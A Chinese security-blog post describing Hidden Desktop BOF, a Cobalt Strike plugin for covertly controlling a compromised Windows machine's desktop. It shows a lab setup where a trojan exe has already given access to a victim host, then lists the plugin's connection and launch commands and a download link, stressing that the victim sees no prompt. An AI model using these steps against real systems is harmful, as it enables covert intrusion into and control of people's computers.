【安全学习】突破局限的远程桌面利器 Hidden Desktop BOF

免责声明:该站所分享的安全知识仅供安全研究和学习之用,如用于其他用途,产生一切后果由使用者承担全部法律及连带责任,与工具作者和本站无关!

在渗透实战环境中,想真正的远程登录window服务器,往往会碰一鼻子灰,要么3389端口没开,要么提权漏洞全部打上厚厚的补丁,而我们又有登录桌面终端的需求怎么办呢? 这时候就需要 Hidden Desktop BOF 操作了。

Hidden Desktop BOF 是基于CS设计的一款插件,允许操作员在用户不知情的情况下与远程桌面会话进行交互,而且也不用我们等到深夜运维人员休息之后操作,完全没有任何提示信息,相比使用3389非常NICE!

本地实操:Linux : CS 服务端(192.168.1.220)Win11 : CS 客户端(192.168.1.212)Win 7 : 实验受害者(192.168.1.128)

CS客户端首先连接服务端,并且加载好插件,随后生成 exe 木马文件,win7 正常上线,使用CS上线操作步骤不再演示。

双击程序 HVNC Server.exe 打开Hidden Desktop 客户端,CS终端输入命令:HiddenDesktop 192.168.1.212 1337 连接客户端,出现UI 窗口则成功连接。

使用命令:hd-launch-explorer 即可连接受害者桌面,可点击左上角调节画面质量,且没有任何提示信息。

其他命令:hd-launch-edge hd-launch-explorer hd-launch-run hd-launch-cmd hd-launch-chrome

下载:https://github.com/WKL-Sec/HiddenDesktop/releases/download/v0.1/HiddenDesktop.zip

转载请注明出处:小贱安全分享 https://www.vpss.cc/424.html
返回顶部